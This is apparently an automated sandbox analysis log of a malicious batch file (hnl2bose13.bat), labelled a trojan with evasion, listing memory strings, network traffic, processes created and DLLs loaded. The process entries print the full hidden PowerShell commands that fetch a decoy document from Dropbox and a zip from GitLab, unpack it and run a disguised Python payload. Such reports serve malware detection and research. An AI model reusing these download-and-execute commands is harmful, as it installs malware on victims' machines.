              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hellofax.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hellosign.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.paypal.com/sdk/js
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.recaptcha.net/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B2AFA12_2_00007FFD348B2AFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B42FA12_2_00007FFD348B42FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B273512_2_00007FFD348B2735
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B632112_2_00007FFD348B6321
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B35F212_2_00007FFD348B35F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B100512_2_00007FFD348B1005
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD348B46F214_2_00007FFD348B46F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD348B63F814_2_00007FFD348B63F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD348B25FD14_2_00007FFD348B25FD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C34FA16_2_00007FFD348C34FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C38D516_2_00007FFD348C38D5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C5FF816_2_00007FFD348C5FF8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C261D16_2_00007FFD348C261D
              Source: classification engine | Classification label: mal96.troj.evad.winBAT@30/16@3/2
              Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\tmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rurk3zrg.q1o.ps1
              Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" "
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\chcp.com | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp.com 437
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe fINd
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp.com 437
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe fINd
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
              Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\find.exe | Section loaded: ulib.dll
              Source: C:\Windows\System32\find.exe | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\find.exe | Section loaded: ulib.dll
              Source: C:\Windows\System32\find.exe | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dlnashext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wpdshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F14B3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.pdb source: powershell.exe, 00000010.00000002.2475239651.000002441C3D1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tomation.pdb source: powershell.exe, 0000000E.00000002.2324464767.00000254F15AD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb' source: powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1460000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: n.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2326723218.00000254F17C1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2324464767.00000254F1549000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ion.pdb source: powershell.exe, 0000000C.00000002.2210649353.000001F3F1529000.00000004.00000020.00020000.00000000.sdmp
